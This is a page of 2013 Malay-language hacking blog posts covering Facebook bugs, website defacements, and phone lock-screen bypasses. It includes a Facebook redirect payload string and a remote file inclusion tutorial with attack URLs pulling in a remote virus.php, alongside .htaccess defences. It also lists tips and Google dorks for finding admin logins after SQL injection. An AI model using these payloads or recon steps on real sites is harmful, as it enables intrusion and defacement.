Showing posts with label vulnerability. Show all posts
Showing posts with label vulnerability. Show all posts

Bug Baru Yang Dijumpai oleh Hacker Palestin di Facebook


Assalamualaikum dan selamat sejahtera [GH] ucapkan.


Sebelum itu, [GH] memohon maaf kepada pembaca kerana kurang mengupdate blog buat seketika ini. Kami sedang sibuk dengan hal-hal peribadi yang tidak dapat dielakkan. Baiklah, mari kembali kepada topik asal. Baru-baru ini, Timeline seorang pengasas Facebook iaitu Mark Zuckerberg telah diceroboh oleh seorang penggodam atau hacker dari Palestin yang dikenali sebagai 'Khalil Shreateh'.

Menurut sumber, beliau juga merupakan seorang Web Developer. Beliau menyatakan telah menjumpai satu bug atau vulnerability(kelemahan) yang baru di Facebook. Dimana kita boleh mengakses tetapan privasi seseorang itu dengan mengepos sesuatu di Timeline/Wall orang tersebut. Khalil Shreateh dipaksa untuk menghantar butiran vulnerability pada Timeline Mark Zuckerberg untuk membuktikan bug yang dijumpainya itu.

Selepas itu, Pasukan Keselamatan Facebook gagal untuk mengenal pasti vulnerability itu sebanyak tiga kali. Bug ini boleh digunakan keatas seseorang yang bukan berada di Friends List kita. Menurut Bug Bounty Program Facebook, seorang penyelidik telah mengemukakan butiran vulnerability melalui e-mail kepada Pasukan Keselamatan Facebook tanpa mendedahkan butiran tersebut kepada orang awam.

Dalam usaha mendapatkan ganjaran minimum sebanyak AS $500, vulnerability haruslah sah. Kelemahan yang dilaporkan terdapat di dalam fail "composer.php" mekanisme Facebook. Pertama, Khalil membuat 1 pos pada Timeline/Wall seorang gadis, Amal Saleh yang belajar di kolej yang sama dengan CEO Facebook, Mark Zuckerberg.


Tetapi, Pasukan Keselamatan Facebook tidak mampu untuk mengeluarkan semula pada masa pertama dan mereka menjawab, "Maaf, ini bukan bug." Akhirnya, beliau menjelaskan pengalaman yang mengecewakan beliau dengan Pasukan Keselamatan lalu menghantar butiran vulnerability pada Timeline Mark Zuckerberg. Untuk membuktikan laporannya dan selepas itu beliau mendapat 'reply' dari seorang 'jurutera Facebook' meminta semua maklumat tentang vulnerability itu.

Selepas menerima laporan bug yang ketiga, seorang jurutera keselamatan Facebook akhirnya mengakui vulnerability itu tetapi berkata bahawa Khalil tidak akan dibayar atas laporan yang dilakukan kerana tindakan beliau telah melanggar syarat-syarat keselamatan laman web perkhidmatan.

Portal Microsoft Malaysia Digodam Hacker Bangladesh


Assalamualaiikum dan Selamat Sejahtera kepada semua pembaca GilerHackers!
kami di maklumkan laman microsoft.com.my diceroboh oleh penggodam dari bagladesh.Mereka yang mengelar kumpulanya dengan Nama TiGer-M@TE  berjaya memecah masuk benteng keselamatan laman berkenaan sekaligus merubah halaman utama kepada defacement mereka.

Selain dari portal microsoft malaysia, laman laman lain juga turut terjejas, diantaranya:
  1. dell.com.my
  2. skype.com.my
  3. kaspersky.com.my
  4. msn.com.my
  5. bing.com.my
  6. google.co.ke
  7. dell.co.ke
  8. skype.co.ke
  9. msn.co.ke
  10. bing.co.ke
  11. linkedin.co.ke
lihat lebih banyak di zone-H.org
mengikut rekod yang dicatatkan, mereka telah menggodam lebih dari 205,700, laman sesawang setakat ini.
Mengikut pada mesej yang ditinggalkan pada defacement adalah berpunca dari tidak puas hati kepada rakyat malaysia kerana layan yang tidak baik terhadap pekerja pekerja bangladesh.

Bypass iPhone iOS 7 LOCK SCREEN Vulnerability


Assalamualaikum dan selamat sejahtera [GH] ucapkan kepada semua pembaca. Baru-baru ini Apple telah melancarkan 1 lagi versi iOS yang terbaru iaitu iOS7 di WWCD 2013. 

Dan selepas 48 jam pelancaran iOS7 itu, seorang pengguna iPhone bernama Jose Rodriguez telah berjaya memintas skrin kunci untuk mengakses aplikasi Photos dalam beberapa saat.

iOS sangat terkenal dengan 'lockscreen security bugs' yang membolehkan sesiapa sahaja memintas kod laluan pada peranti untuk mengakses maklumat yang berkemungkinan adalah rahsia. Video dibawah menunjukkan bagaimana untuk sepenuhnya memintas perlindungan kata laluan iPhone dengan mengakses kalkulator yang ada pada skrin kunci. 



"Dengan membuka Bilik Kawalan iOS dan mengakses aplikasi kalkulator telefon sebelum membuka kamera telefon sesiapa sahaja boleh mengakses, memadam, e-mel, memuat naik atau tweet gambar yang ada dalam peranti itu tanpa mengetahui kod laluan."

Hide My WP! 95% selamat dari SQl injection dan Serangan Xss.


Assalamualaiikum dan selamat sejahtera.
Wordpress merupakan salah satu platform yang sangat popular pada masa kini.Penggunaan wordpress sangat luas, ada yang mengunakan wordpress sebagai blog, ada juga yang mengunakan wordpress sebagai tapak untuk laman sesawang rasmi ataupun peribadi.

Pada hakikatnya, ramai pengguna ingin menyembunyikan penggunaan wordpress mereka, ini kerana terdapat pelbagai bugs pada plugin atau tema wordpress.Untuk memastikan ianya sentiasa selamat, kita mungkin tiada masa untuk menyemak atau mengemas kini plugin setiap hari.


Kini anda boleh mencuba plugin Hidemy WP sebgai salah satu cara meningkatkan keselamatan sistem wordpress anda.Baru baru ini, kita boleh lihat serangan besar besaran pengodam terhadap laman laman yang digodam adalah kebanyakannya menggunakan sistem dari wordpress. diantara botnet yang paling agresif yang pernah dilihat

Tingkatkan keselamatan anda
Hidemy WP mengawal akses WP kepada fail PHP. Ia melindungi laman web anda 95% daripada SQL Injection dan serangan XSS. Ini bermakna anda boleh memasang plugin yang tidak selamat tanpa bimbang tentang keselamatan terutama kepada ancaman penggodam, spam dan robot yang selalu menyerang pengguna WordPress.

Ketahui lebih lanjut bagaimana ia berfungsi DISINI | lihat live demo DISINI
Jika anda ingin muat turun secara percuma, sila klick pada button download dibawah:


Jangan Lupa untuk terus bersama kami untuk info info terbaru di facebook GilerHackers DISINI.

Pembagunan Facebook Terjejas kepada ' Text Load Injection!'

Assalamualaiikum dan selamat sejahtera.
Kumpulan penggodam antarabangsa, Anonghost. salah seorang ahlinya memberita kami keselamatan pembagunan facebook terjejas dengan beberapa kelemahan yang dijumpai mereka baru baru ini.

Domain utama developers.facebook.com dikata berjaya ditembus masuk dengan menggunakan kaedah Text Load Injection! Dibawah adalah screenshot yang sempat [GH] ambil -kredit kepada mauritania attacker.


Link: https://developers.facebook.com/MAURITANIA%20ATTACKER%20WAS%20HERE&__a=
Jika Bugs ini sudah di patch, anda boleh melihat mirror di sini: http://zone-h.org/mirror/id/19711340

menurut beliau juga, code ini juga boleh disuntik oleh sesiapa sahaja selagi ianya tidak dibaik pulih sepenuhnya:
for (;;);{"__ar":1,"payload":{"redirect":"/MAURITANIA ATTACKER WAS HERE&__a=/"},"bootloadable":{},"ixData":[]}

Bypass Samsung Galaxy Note II LOCK SCREEN Vulnerability


Assalamualaiikum dan selamat sejahtera.Jika anda seorang pengguna iOS,Mungkin anda pernah mendengar tentang kelemahan keselamatan iPhone yang ditemui baru-baru ini. Boleh rujuk disini [+]Link

Kali ini ia adalah Android yang di buzz hari ini. Khususnya, ia phablet kreatif Samsung Galaxy Note II. Seorang Youtuber bernama Terence Eden baru-baru ini telah memuat naik satu video di youtube yang menunjukkan kelemahan keselamatan pada Samsung Galaxy Note II.

Kelemahan ini menunjukkan bagaimana pengguna boleh memintas skrin kunci dan mengakses aplikasi atau panggilan dari Home Screen  Android OS. Kelemahan ini telah ditunjukkan pada Note II berjalan pada Android 4.1.2 saham OS. Walaupun, pengguna hanya boleh mengakses skrin untuk satu atau dua kali, tetapi ia adalah satu jangka masa yang cukup untuk membuat panggilan atau membuka mana-mana aplikasi pada skrin jika anda cukup cepat.



* Samsung Galaxy S3 Android 4.1.2 juga dikatakan terdedah pada masalah yang sama.

Hack Dengan Kaedah RFI [Remote File Inclusion ] Bagaimana ia berfungsi?

Assalamualaiikum dan selamat sejahtera.RFI atau Remote file inclusion sekarang menjadi salah satu kaedah yang selalu digunakan penggodam selain kaedah suntikan SQL.Jadi kami di [GH] cuba mencari info bagaimana ia berfungsi.

"Remote file inclusion" atau lebih mesra dikenali sebagai "R.F.I" adalah salah satu serangan terhadap laman web dengan membolehkan pihak penyerang menjalankan skrip atau aturcara mereka tersendiri. Kesannya bergantung kepada jenis skrip yang dimasukkan oleh pihak penyerang.

Sekiranya mereka menjalankan aturcara membuang pangkalan data, maka ke semua laman web anda tidak dapat dijalankan memandangkan pangkalan data anda sudah dibuang.

Akhirnya, anda terpaksa mengembalikan pangkalan data yang telah disalin sebelum ini bagi membolehkan laman web berjalan semula seperti biasa. Sehubungan dengan itu, anda boleh gunakan artikel ini sebagai panduan untuk menyelamatkan laman web dari digondam melalui cara ini seandainya anda menggunakan skrip laman web tersendiri. Jika menggunakan CMS, tidak perlu risau mengenainya.

Cara Serangan RFI
Kaedah serangan RFI ini sebenarnya bergantung kepada cara penulisan skrip anda di laman web yang telah dikesan oleh pihak penyerang.

Untuk melakukan penyerang perlu tahu secara lengkap skrip yang anda jalankan. Berikut adalah antara contoh aturcara laman web anda yang telah membuka ruang kepada penyerang dan semestinya dijalankan pada pelayan yang menggunakan PHP.
include($page . '.php');

Aturcara di atas dituliskan dalam satu fail .php yang bakal memproses maklumat yang dihantar contohnya satu laman web borang, selepas diklik butang "Hantar", semua maklumat yang dimasukkan oleh pengguna akan ditujukan ke laman ini. Katakan nama fail tersebut adalah index.php.

Maka selepas diklik butang "Hantar", alamat URL di pelayar web (web browser) akan bertukar menjadi seperti ini:
http://www.websaya.com/index.php?page=arkib

Di mana, bahagian aturcara di dalam index.php akan ditukarkan kepada pembolehubah yang dinyatakan dalam URL menjadi seperti ini:
include('arkib.php');

dan secara tersendirinya, fail index.php akan memanggil fail arkib.php ke dalamnya dan proses seterusnya dijalankan. Oleh kerana pembolehubah $page dalam index.php tidak dinyatakan nilaian asal (default) maka pengondam akan menggunakan pembolehubah ini untuk memasukkan nilaian dari laman web yang lain. Contohnya:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php

dan di bahagian index.php pula, pembolehubah include akan menafsirkan nilaian tersebut menjadi seperti ini:
include('http://www.weblain.com/virus.php.php');

Tetapi oleh kerana pihak pengondam tidak mengetahui secara lengkap apakah jenis sambungan yang anda akan tetapkan, jadi mereka akan meletakkan tanda "?" dibelakang alamat URL bagi membolehkan aturcara dibahagian pelayan melepaskan fail tersebut untuk diproses.

Tanda "?" membawa maksud supaya pihak pelayan (server) menentukan sendiri bentuk fail tersebut. Sekiranya sambungan yang telah ditetapkan adalah .php, maka dengan sendiri fail tersebut dilepaskan.

Sekiranya sambungan dibahagian include ditetapkan kepada .ini berbanding .php seperti include($page . '.ini'); maka "?" akan menjadikan sambungan seterusnya sebagai pembolehubah yang lain. Sebagai contoh:
include($page . '.ini');

dan "URL injection" yang dimasukkan adalah seperti ini:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php?

maka, proses yang berlaku di dalam index.php adalah:
include('http://www.weblain.com/virus.php?.ini');

pada asalnya, bagi menjalankan aturcara, pengondam seharusnya menggunakan sambungan fail .ini. Tetapi pihak pembangunan telah meletakkan sambungan .ini berbanding .php. Oleh kerana kehadiran "?", maka dibahagian pelayan (server) tetap menjalankan proses dengan memanggil fail tersebut walaupun sambungan berlainan kerana tanda "?" menjadikan sambungan .ini sebagai satu pembolehubah yang lain.

Dengan ini, fail virus.php tersebut dengan sendirinya akan dimasukkan ke dalam index.php dan dijalankan. Seterusnya akan merosakkan laman web anda mengikut aturcara yang ditulis oleh pihak pengondam.

Kenapa serangan ini boleh dijalankan
register_global dihidupkan. register_global membolehkan PHP mengambil secara pembolehubah yang dinyatakan di dalam URL tanpa melalui proses tapisan sekuriti terlebih dahulu. Oleh sebab itu, kebiasaanya untuk pelayan-pelayan web (server) yang baru, fungsi ini dimatikan secara asalnya.

allow_url_fopen
dihidupkan. Fungsi ini membenarkan PHP untuk memasukkan sebarang maklumat atau membuka ruang untuk kemasukkan fail yang lain dari domain yang asal (kiranya memasukkan fail dari tempat yang lain). Oleh sebab itu, dalam versi PHP 5.2, fungsi ini telah diubahsuai dan diasingkan yang mana untuk fungsi include(), allow_url_include telah diwujudkan dan tetapan ini telah dimatikan secara sendirinya.

Cara mengatasi serangan RFI
Terdapat beberapa cara yang boleh kita lakukan untuk mengatasi dan melindungi laman web dari terkena serangan ini tetapi di sini saya cuma tunjukkan satu cara sahaja iaitu dengan menggunakan .htaccess fail. Sebelum itu, perlu pastikan bahawa pelayan menyokong "mod_rewrite"

Dengan menggunakan arahan di bawah ini, ia akan memeriksa sebarang permintaan yang datang dari URL luaran iaitu http://, https:// dan ftp://
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

Seterusnya dengan memasukkan kod di atas di dalam .htaccess dan diikuti dengan beberapa arahan lain seperti:
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
RewriteRule ^(.+)$ - [F]

Seandainya anda mempunyai akses terus ke dalam pelayan untuk mengendalikan beberapa modul-modul server, anda boleh gunakan arahan ini:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [env=rfi:true]
</IfModule>
CustomLog /path/to/logs/rfi.log combined env=rfi

Sumber Rujukan

Kaedah Mencari "Admin Login" di Laman Web

Assalamualaiikum dan selamat sejahtera.
Mencari halaman "Admin Login" kadang kala sangat sukar, Disini [GH] kongsikan sedikit tips yang mungkin membantu anda.Setelah sesuatu web terdedah kepada suntikan SQL (SQLI)  mungkin mudah untuk mendapat nama pengguna dan katalaluan, langkah seterusnya ialah  mencari halaman Log masuk "Admin Login" untuk masuk sebagai pemilik laman berkenaan.

Dibawah adalah beberapa kaedah / Tips untuk mencari halaman log masuk pentadbir "Admin Login"
1.Menambah Url
ni adalah kaedah yang pertama dan paling mudah untuk mencari laman login admin. Anda boleh menambah beberapa perkataan selepas URL.contoh:
www.site.com/admin
www.site.com/administrator
www.site.com/login
www.site.com/wp-login.php
www.site.com/admin.php

2.Mengguna Crawling software
Anda boleh menggunakan pelbagai alat jenis Crawling software untuk merangkak ke dalam laman web untuk mendapatkan halaman "Admin Login". ia mencari semua muka surat/page didalam laman web dan memaparkan senarai semua laman di direktori.

3.Robots.txt
pemilik laman web sebenarnya memberikan senarai pautan yang tidak boleh dicari oleh enjin pencarian "Search Engine".kadang kala pemilik akan menyembunyikan Halaman "Admin Login" Mereka pada robots.txt. secara langsung anda boleh melihat di fail robots.txt dengan menambah /robots.txt pada Url.
Contoh: www.site.com/robots.txt

4.Google Dork'
Ada juga boleh menggunakan google dork untuk mencari halaman "Admin Login" contoh seperti:
#Site:site.com “admin”
#Site:site.com inurl:login
#site:site.com intitle:"admin login"

5.Online
Terdapat juga beberapa laman web yang menyediakan perkhidmatan mencari halaman "Admin Login" secara online, anda juga boleh menggunakan laman web ini untuk mencari halaman "Admin Login" [Link+]

6.Havij
Havij merupakan salah satu software yang sangat popular sehingga ke hari ini,ia juga mempunyai pengimbas untuk membantu anda menemukan halaman "Admin Login"

7.Dan Banyak Lagi.. ^_^

Sebagai Tindakan, anda mungkin dapat mencegah penggodam khasnya yang berniat jahat untuk masuk ke dalam halaman anda,Jadi cuba elakan  perkara yang tersenarai diatas dari ditemukan oleh mereka.. sekian..

Hong Leong Bank Kena Hack

Assalamualaiikum dan selamat sejahtera kepada semua rakan rakan [GH] yang sentiasa mengikuti perkembangan blog kami.Berita yang agak mengejutkan kami ketika mendapat tahu bahawa laman Hong Leong Bank Malaysia digodam sekitar 10 minit yang lepas. Laman Hong Leong bank Malaysia, www.hlam.com.my diceroboh! Penggodam yang berniat jahat mengubah laman utama kepada defacement mereka yang disertakan sebuah video seolah-olah ingin menyampaikan mesej tertentu kepada kerajaan Malaysia.

Screen shoot:

Link: http://www.hlam.com.my/
Mirror: http://www.hack-db.com/312903.html

video yang diletakan pada defacement bertajuk "This is Satu Malaysia


Penggodam tempatan yang dikenali dengan nama KamiSec Team mendakwa, kelemahan sistem pada bahagian pentadbir membuatkan laman berkenaan digodam.
"Kami Test Sekadar Untuk Menguji tahap web itu . dan kami juga mengiklan kan video dari Be End- hahahaha "- KamiSec Team.

Bagi pendapat [GH], perbuatan seperti ini tidak sepatutnya berlaku, selain boleh mencemarkan nama malaysia, kita juga haruslah bersikap profesional,[GH] juga ingin menegaskan disini, kami tidak berpihak pada mana mana pihak, kami cuma memberi pendapat  peribadi sahaja. Pandangan dan komen terpulang kepada pembaca untuk menilai.walupun begitu, pihak webmaster sepatutnya mengambil serius terhadap keselamatan laman webs pelangan mereka, lebih lebih lagi laman penting seperti ini.
 

© Copyright 2013 [GH] GilerHackers! All Rights Reserved.
Beo v.3 Themes Design by BukhariMalek | Contact On Facebook Diselenggara Oleh: IdeaKreatif